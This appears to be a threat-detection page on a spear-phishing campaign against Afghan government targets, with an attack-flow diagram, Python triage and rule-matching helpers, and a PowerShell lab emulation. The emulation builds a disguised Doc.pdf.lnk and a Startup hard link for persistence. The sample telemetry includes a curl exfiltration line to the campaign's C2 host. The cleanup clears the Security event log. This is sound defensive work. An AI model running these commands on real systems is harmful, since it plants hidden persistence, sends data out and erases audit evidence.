Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Operation Nomad Leopard is a targeted spear-phishing campaign aimed at government-related entities in Afghanistan. The lure chain delivers a malicious ISO via a shortened TinyURL, packaging a benign-looking PDF decoy alongside a weaponized LNK shortcut. When opened, the LNK drops and launches a disguised executable (FALSECUB) by copying it into ProgramData, then establishes persistence by creating a hard link in the user Startup folder. Once active, FALSECUB runs anti-analysis checks, inventories host and user context, enumerates drives and high-value folders, and then exfiltrates collected details using curl over HTTPS. Hosting and delivery infrastructure leverage Cloudflare and a dynamic DNS domain to improve availability and complicate blocking.
Investigation
SEQRITE Labs correlated telemetry showing initial sightings of the ISO on 23 December, with later exposure via VirusTotal. Analysts extracted the three embedded ISO artifacts and profiled the LNK’s execution behavior, including its copy-and-launch routine and the Startup-folder hard-link persistence. Static analysis of the FALSECUB payload highlighted relevant API usage, host-survey logic, and the HTTPS exfiltration method driven by curl. Infrastructure enrichment using passive DNS and FOFA yielded IP mappings, the dynamic DNS domain, and a related GitHub drop location. Attribution was explored through the associated GitHub account and linked social media footprints.
Mitigation
Block ISO execution from email and restrict mounting of untrusted disk images. Disable or tightly monitor LNK execution from archives and user-writable locations, and enforce application allowlisting for binaries launched from ProgramData. Alert on Startup-folder hard-link creation and unexpected curl execution from non-administrative workflows. Apply DNS and network controls to block known malicious domains and associated IPs.
Response
Alert on the specific ISO/LNK/FALSECUB filenames and hashes, then contain impacted endpoints. Capture volatile memory, review startup items and scheduled tasks, and block traffic to the identified C2 IPs/domains. Perform endpoint forensics to locate copied payloads and assess any exfiltrated datasets.
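The "review startup items" step above is where this campaign's persistence hides best: a hard link planted with mklink /H shows up in the Startup folder as an ordinary file, with no shortcut target to inspect and the same hash as the ProgramData copy. The following Python triage helper is an added example, not SEQRITE's or the page's own tooling: it flags Startup entries whose NTFS link count is above one. Its lab directory builder, the fake payload bytes and the file names inside it are constructed for the example; the Startup paths it checks on a live host are the standard per-user and all-users folders.

```python
import os
import tempfile
from pathlib import Path

# Extensions that Explorer will execute or open from a Startup folder at logon.
RUNNABLE_EXT = {".exe", ".com", ".dll", ".lnk", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".scr", ".hta"}


def startup_dirs():
    """Standard per-user and all-users Startup folders on Windows (empty list elsewhere)."""
    candidates = []
    if "APPDATA" in os.environ:
        candidates.append(Path(os.environ["APPDATA"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "Startup")
    if "ProgramData" in os.environ:
        candidates.append(Path(os.environ["ProgramData"]) / "Microsoft" / "Windows" / "Start Menu" / "Programs" / "StartUp")
    return [d for d in candidates if d.is_dir()]


def find_hardlinked_entries(dirs):
    """Return [(path, link_count, runnable)] for every regular file in dirs with more than one hard link.

    A file planted with mklink /H is indistinguishable from a plain copy by name, size or hash;
    st_nlink > 1 is the property that gives it away (Python fills st_nlink on NTFS as on POSIX).
    """
    findings = []
    for d in dirs:
        for p in Path(d).iterdir():
            if p.is_symlink() or not p.is_file():
                continue
            st = p.stat()
            if st.st_nlink > 1:
                findings.append((str(p), st.st_nlink, p.suffix.lower() in RUNNABLE_EXT))
    return sorted(findings)


def report(dirs):
    """One line per finding, with the Windows follow-up command that lists the link's sibling paths."""
    return [f"[{'RUNNABLE' if runnable else 'other'}] {path}: {nlink} hard links; "
            f'run: fsutil hardlink list "{path}"'
            for path, nlink, runnable in find_hardlinked_entries(dirs)]


def build_lab_startup_dir():
    """Constructed lab layout (not a real host): a fake payload copy under a ProgramData-like directory,
    a hard link to it in a Startup-like directory (the mklink /H step), and one ordinary single-link entry."""
    root = Path(tempfile.mkdtemp(prefix="nomad_leopard_lab_"))
    programdata, startup = root / "ProgramData", root / "Startup"
    programdata.mkdir()
    startup.mkdir()
    payload = programdata / "searchmgr.exe"
    payload.write_bytes(b"MZ" + b"\x00" * 62)  # fake PE stub, not executable content
    os.link(payload, startup / "searchmgr.exe")  # what mklink /H does on the victim
    (startup / "Example.lnk").write_bytes(b"L\x00\x00\x00")  # benign-looking entry with a single link
    return startup


if __name__ == "__main__":
    targets = startup_dirs() or [build_lab_startup_dir()]
    print("\n".join(report(targets)) or "no hard-linked Startup entries found")
```

On a live host run it as the affected user. For each flagged entry, `fsutil hardlink list <file>` prints the sibling paths (here the ProgramData copy); collect both before deleting anything, because removing one link leaves the content reachable through the other.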
Attack Flow
graph TB
  %% Class definitions
  classDef action fill:#99ccff
  classDef artifact fill:#ffcc99
  classDef tool fill:#ccffcc
  classDef process fill:#ffeb99

  %% Nodes – Actions (Techniques)
  action_initial_access["<b>Action</b> – <b>T1566.001 Phishing</b><br/><b>Description</b>: Spearphishing attachment delivers malicious ISO file."]
  class action_initial_access action
  action_user_exec["<b>Action</b> – <b>T1204.002 User Execution</b><br/><b>Description</b>: Victim opens ISO which mounts as virtual drive."]
  class action_user_exec action
  action_masquerade["<b>Action</b> – <b>T1036.008 Masquerading</b><br/><b>Description</b>: File type masquerading hides malicious content."]
  class action_masquerade action
  action_motbypass["<b>Action</b> – <b>T1553.005 Mark of the Web Bypass</b><br/><b>Description</b>: ISO container avoids MoW restrictions."]
  class action_motbypass action
  action_lnk_smuggle["<b>Action</b> – <b>T1027.012 LNK Icon Smuggling</b><br/><b>Description</b>: Crafted shortcut launches payload and decoy."]
  class action_lnk_smuggle action
  action_cmd_shell["<b>Action</b> – <b>T1059.003 Windows Command Shell</b><br/><b>Description</b>: Executes commands to copy payload, create hard link, start execution."]
  class action_cmd_shell action
  action_persistence["<b>Action</b> – <b>T1547.001 Startup Folder</b><br/><b>Description</b>: Persistence via hard link in Startup folder."]
  class action_persistence action
  action_sandbox_evasion["<b>Action</b> – <b>T1497.002 Sandbox Evasion</b><br/><b>Description</b>: Checks tick count, memory size, debugger before proceeding."]
  class action_sandbox_evasion action
  action_discovery_sysinfo["<b>Action</b> – <b>T1082 System Information Discovery</b><br/><b>Description</b>: Gathers OS version and computer name."]
  class action_discovery_sysinfo action
  action_discovery_user["<b>Action</b> – <b>T1033 System Owner/User Discovery</b><br/><b>Description</b>: Retrieves current username."]
  class action_discovery_user action
  action_discovery_files["<b>Action</b> – <b>T1083 File and Directory Discovery</b><br/><b>Description</b>: Enumerates user directories such as Desktop and Documents."]
  class action_discovery_files action
  action_collection["<b>Action</b> – <b>T1074.001 Local Data Staging</b><br/><b>Description</b>: Stages collected files for exfiltration."]
  class action_collection action
  action_c2_webservice["<b>Action</b> – <b>T1102 Web Service</b><br/><b>Description</b>: Uses HTTPS web service for C2 communication."]
  class action_c2_webservice action
  action_c2_webprotocol["<b>Action</b> – <b>T1071.001 Web Protocols</b><br/><b>Description</b>: Communicates via HTTP/HTTPS (curl)."]
  class action_c2_webprotocol action
  action_exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/><b>Description</b>: Sends staged data to remote server."]
  class action_exfiltration action

  %% Nodes – Artifacts (Files)
  artifact_iso["<b>Artifact</b> – <b>Name</b>: malicious.iso<br/><b>Type</b>: ISO image containing decoy PDF and payload."]
  class artifact_iso artifact
  artifact_decoy_pdf["<b>Artifact</b> – <b>Name</b>: Doc.pdf<br/><b>Type</b>: Decoy PDF displayed to user."]
  class artifact_decoy_pdf artifact
  artifact_payload_jpg["<b>Artifact</b> – <b>Name</b>: payload.jpg<br/><b>Type</b>: Malicious payload disguised as JPEG."]
  class artifact_payload_jpg artifact
  artifact_lnk["<b>Artifact</b> – <b>Name</b>: Doc.pdf.lnk<br/><b>Type</b>: Shortcut with malicious icon."]
  class artifact_lnk artifact
  artifact_hardlink["<b>Artifact</b> – <b>Name</b>: searchmgr.exe (hard link)<br/><b>Location</b>: Startup folder"]
  class artifact_hardlink artifact
  artifact_c2_endpoint["<b>Artifact</b> – <b>Domain</b>: thepad0loc93x.ddns.net<br/><b>Endpoint</b>: /upload/"]
  class artifact_c2_endpoint artifact

  %% Nodes – Tools / Processes
  process_mklink["<b>Process</b> – <b>Command</b>: mklink<br/><b>Description</b>: Creates hard link in Startup folder."]
  class process_mklink process
  tool_curl["<b>Tool</b> – <b>Name</b>: curl<br/><b>Description</b>: Transfers data over HTTPS to C2 endpoint."]
  class tool_curl tool

  %% Connections
  action_initial_access -->|delivers| artifact_iso
  artifact_iso -->|mounted by victim| action_user_exec
  action_user_exec -->|contains| artifact_decoy_pdf
  action_user_exec -->|contains| artifact_payload_jpg
  action_user_exec -->|leads to| action_masquerade
  action_masquerade -->|applies to| artifact_payload_jpg
  action_user_exec -->|enables| action_motbypass
  action_motbypass -->|bypasses| artifact_iso
  action_user_exec -->|creates| artifact_lnk
  artifact_lnk -->|used by| action_lnk_smuggle
  action_lnk_smuggle -->|executes| action_cmd_shell
  action_cmd_shell -->|runs| process_mklink
  process_mklink -->|creates| artifact_hardlink
  artifact_hardlink -->|provides| action_persistence
  action_cmd_shell -->|checks| action_sandbox_evasion
  action_cmd_shell -->|performs| action_discovery_sysinfo
  action_cmd_shell -->|performs| action_discovery_user
  action_cmd_shell -->|performs| action_discovery_files
  action_cmd_shell -->|stages data via| action_collection
  action_collection -->|uploads using| action_c2_webservice
  action_c2_webservice -->|uses protocol| action_c2_webprotocol
  action_c2_webprotocol -->|utilizes tool| tool_curl
  tool_curl -->|contacts| artifact_c2_endpoint
  artifact_c2_endpoint -->|receives data from| action_exfiltration
  action_exfiltration -->|exfiltrates| artifact_c2_endpoint

  %% Styling
  class action_initial_access,action_user_exec,action_masquerade,action_motbypass,action_lnk_smuggle,action_cmd_shell,action_persistence,action_sandbox_evasion,action_discovery_sysinfo,action_discovery_user,action_discovery_files,action_collection,action_c2_webservice,action_c2_webprotocol,action_exfiltration action
  class artifact_iso,artifact_decoy_pdf,artifact_payload_jpg,artifact_lnk,artifact_hardlink,artifact_c2_endpoint artifact
  class tool_curl tool
  class process_mklink process
Detections
- Possible Malicious LNK File with Double Extension (via cmdline)
- Possible Dynamic DNS Service Was Contacted (via dns)
- Suspicious Binary / Scripts in Autostart Location (via file_event)
- VHDMP Optic Disk Image Was Mounted (via VHDMP)
- IOCs (HashSha256) to detect: Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan
- IOCs (SourceIP) to detect: Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan
- IOCs (DestinationIP) to detect: Operation Nomad Leopard: Targeted Spear-Phishing Campaign Against Government Entities in Afghanistan
- Detection of FALSECUB Malware Execution via Malicious LNK File [Windows Process Creation]
- Detection of Malicious Payload and Persistence via Hardlink Creation [Windows File Event]
- Detection of FALSECUB Implant C2 Communication [Windows Network Connection]
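To show what the rule families listed above key on, and how their hits line up into the chain described in the Summary, here is an added Python example. It is not the logic of the listed rules and not SEQRITE's code: five simplified checks run over constructed Sysmon-style events (Event ID 1 process create, 11 file create, 22 DNS query). Artifact names (Doc.pdf.lnk, payload.jpg, searchmgr.exe, thepad0loc93x.ddns.net, /upload/) come from the Attack Flow; the user name, drive letter, benign noise events and the dynamic-DNS suffix list are assumptions made for the example.

```python
import re

# Dynamic-DNS suffixes commonly abused for C2 (illustrative list; extend it from your own intel).
DYNAMIC_DNS_SUFFIXES = (".ddns.net", ".no-ip.org", ".hopto.org", ".zapto.org", ".duckdns.org")

# "Doc.pdf.lnk"-style double extensions: a document/image extension hiding a shortcut.
DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|txt)\.lnk\b", re.IGNORECASE)
# mklink /H whose link path (quoted or not) lands inside a Startup folder.
HARDLINK_TO_STARTUP = re.compile(r'mklink\s+/h\s+"?[^"&]*\\Startup\\', re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
AUTOSTART_EXT = (".exe", ".dll", ".lnk", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".scr", ".hta")


def rule_lnk_double_extension(ev):
    """Possible Malicious LNK File with Double Extension (via cmdline)."""
    return ev["EventID"] == 1 and DOUBLE_EXT_LNK.search(ev.get("CommandLine", "")) is not None


def rule_startup_hardlink_cmd(ev):
    """Persistence via hard link: cmd.exe running mklink /H into a Startup folder."""
    return (ev["EventID"] == 1
            and ev.get("Image", "").lower().endswith("\\cmd.exe")
            and HARDLINK_TO_STARTUP.search(ev.get("CommandLine", "")) is not None)


def rule_autostart_drop(ev):
    """Suspicious Binary / Scripts in Autostart Location (via file_event)."""
    target = ev.get("TargetFilename", "")
    return (ev["EventID"] == 11
            and STARTUP_DIR.search(target) is not None
            and target.lower().endswith(AUTOSTART_EXT))


def rule_dynamic_dns(ev):
    """Possible Dynamic DNS Service Was Contacted (via dns)."""
    return ev["EventID"] == 22 and ev.get("QueryName", "").lower().endswith(DYNAMIC_DNS_SUFFIXES)


def rule_curl_exfil(ev):
    """FALSECUB C2: curl over HTTPS from a ProgramData-resident parent, or to a dynamic-DNS host."""
    if ev["EventID"] != 1 or not ev.get("Image", "").lower().endswith("\\curl.exe"):
        return False
    cmdline = ev.get("CommandLine", "").lower()
    parent = ev.get("ParentImage", "").lower()
    return "https://" in cmdline and (
        parent.startswith("c:\\programdata\\") or any(s in cmdline for s in DYNAMIC_DNS_SUFFIXES))


RULES = {
    "lnk_double_extension": rule_lnk_double_extension,
    "startup_hardlink_cmd": rule_startup_hardlink_cmd,
    "autostart_drop": rule_autostart_drop,
    "dynamic_dns": rule_dynamic_dns,
    "curl_exfil": rule_curl_exfil,
}


def evaluate(events):
    """Run every rule over every event; one hit record per (event, rule) match."""
    return [{"index": i, "rule": name, "Image": ev.get("Image", "")}
            for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


def chain_coverage(events):
    """Stages of the LNK -> hard link -> Startup drop -> dynamic DNS -> curl chain seen in the events."""
    return {hit["rule"] for hit in evaluate(events)}


def full_chain_observed(events):
    return chain_coverage(events) == set(RULES)


def sample_events():
    """Constructed telemetry for one host: five campaign events followed by three benign ones."""
    startup = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
    cmd, explorer = r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe"
    return [
        {"EventID": 1, "Image": cmd, "ParentImage": explorer,
         "CommandLine": r'cmd.exe /c start "" "E:\Doc.pdf.lnk"'},
        {"EventID": 1, "Image": cmd, "ParentImage": explorer,
         "CommandLine": r'cmd.exe /c copy /y E:\payload.jpg C:\ProgramData\searchmgr.exe'
                        rf' & mklink /H "{startup}\searchmgr.exe" C:\ProgramData\searchmgr.exe'
                        r' & start "" C:\ProgramData\searchmgr.exe'},
        {"EventID": 11, "Image": cmd, "TargetFilename": rf"{startup}\searchmgr.exe"},
        {"EventID": 22, "Image": r"C:\ProgramData\searchmgr.exe", "QueryName": "thepad0loc93x.ddns.net"},
        {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\ProgramData\searchmgr.exe",
         "CommandLine": r'curl -s -X POST https://thepad0loc93x.ddns.net/upload/ -F "file=@C:\ProgramData\host.txt"'},
        # benign noise: an admin's curl, a browser lookup, a build-script hard link outside Startup
        {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
         "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "curl https://www.example.com/"},
        {"EventID": 22, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "QueryName": "www.example.com"},
        {"EventID": 1, "Image": cmd, "ParentImage": cmd,
         "CommandLine": r"cmd.exe /c mklink /H C:\build\out.bin C:\build\in.bin"},
    ]


if __name__ == "__main__":
    for hit in evaluate(sample_events()):
        print(f"event {hit['index']}: {hit['rule']} ({hit['Image']})")
    print("full chain observed:", full_chain_observed(sample_events()))
```

Each rule alone is noisy in a real estate (developers create hard links, admins run curl); the point of chain_coverage is that the five stages landing on one host in a short window is what separates this campaign from the noise, which is how the three benign events at the end stay silent.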
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
Initial Delivery: The attacker sends a shortened link to an ISO image. Once mounted as a virtual drive, the image exposes a decoy PDF (Doc.pdf), the FALSECUB payload disguised as an image (payload.jpg) and a shortcut named Doc.pdf.lnk that carries a PDF icon, so the user believes they are opening the decoy.
Shortcut Execution: When the user double-clicks the shortcut, Explorer.exe resolves it and launches its target, cmd.exe, with the argument string embedded in the shortcut. In the lab the shortcut is opened through cmd.exe /c start "" "%USERPROFILE%\Desktop\Doc.pdf.lnk", so the string Doc.pdf.lnk appears in a process command line, which is the telemetry the double-extension rule matches on.
Persistence Setup: The shortcut's argument string runs three commands in sequence:
copy /y <payload> C:\ProgramData\searchmgr.exe – stages the payload in a user-writable location, as FALSECUB does.
mklink /H "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\searchmgr.exe" C:\ProgramData\searchmgr.exe – creates a hard link to the staged copy in the user's Startup folder. A hard link to a file the user owns needs no elevation, unlike a symbolic link, but it cannot cross volumes, which is why the payload is copied off the mounted ISO first.
start "" C:\ProgramData\searchmgr.exe – launches the staged payload.
Because mklink is a cmd.exe built-in, all three commands land in the CommandLine field of the Event ID 4688 (or Sysmon Event ID 1) record for cmd.exe, satisfying the detection rule's OR condition. Event ID 4688 carries the command line only when the "Include command line in process creation events" audit policy is enabled.
Regression Test Script: The following PowerShell script reproduces the entire malicious flow in a controlled lab environment. The "payload" is a renamed copy of cmd.exe, and the names (Doc.pdf.lnk, searchmgr.exe) follow the Attack Flow above.
# -----------------------------
# 1. Prepare decoy PDF (a harmless text file named like a PDF)
# -----------------------------
$pdfPath = "$env:UserProfile\Documents\Doc.pdf"
Set-Content -Path $pdfPath -Value "This is a decoy PDF." -Encoding ASCII

# -----------------------------
# 2. Staging locations: payload copy in ProgramData, hard link in the user Startup folder
# -----------------------------
$payloadSrc  = "$env:SystemRoot\System32\cmd.exe"      # stands in for payload.jpg
$payloadDst  = "$env:ProgramData\searchmgr.exe"
$startupLink = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\searchmgr.exe"

# Command chain the shortcut hands to cmd.exe: copy, hard link (mklink /H: same volume, no elevation), launch
$chain = "copy /y `"$payloadSrc`" `"$payloadDst`" & mklink /H `"$startupLink`" `"$payloadDst`" & start `"`" `"$payloadDst`" /c echo Simulated payload executed"

# -----------------------------
# 3. Create the double-extension shortcut (Doc.pdf.lnk) whose real target is cmd.exe
# -----------------------------
$lnkPath = "$env:UserProfile\Desktop\Doc.pdf.lnk"
$ws = New-Object -ComObject WScript.Shell
$shortcut = $ws.CreateShortcut($lnkPath)
$shortcut.TargetPath = "$env:SystemRoot\System32\cmd.exe"
$shortcut.Arguments = "/c $chain"
$shortcut.WorkingDirectory = "$env:UserProfile\Desktop"
$shortcut.IconLocation = "$pdfPath,0"   # the real LNK borrows a PDF icon
$shortcut.WindowStyle = 7               # minimized: hides the console window, as the malicious LNK would
$shortcut.Save()

# -----------------------------
# 4. Execute the shortcut via cmd.exe /c start so that the .pdf.lnk path lands in a
#    4688 / Sysmon 1 command line; ShellExecute then runs the shortcut's target with the chain above
# -----------------------------
Write-Host "Executing malicious shortcut..."
Start-Process -FilePath "$env:SystemRoot\System32\cmd.exe" -ArgumentList "/c start `"`" `"$lnkPath`""
Cleanup Commands:
# Remove shortcut and decoy PDF
Remove-Item "$env:UserProfile\Desktop\Doc.pdf.lnk" -Force -ErrorAction SilentlyContinue
Remove-Item "$env:UserProfile\Documents\Doc.pdf" -Force -ErrorAction SilentlyContinue
# Delete both the Startup hard link and the staged copy: removing one hard link leaves the file reachable through the other
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\searchmgr.exe" -Force -ErrorAction SilentlyContinue
Remove-Item "$env:ProgramData\searchmgr.exe" -Force -ErrorAction SilentlyContinue
# Optional, lab only: clear the Security log. This needs administrator rights and itself writes Event ID 1102
# (audit log cleared), which most SOCs alert on; never run it on a production host.
wevtutil cl Security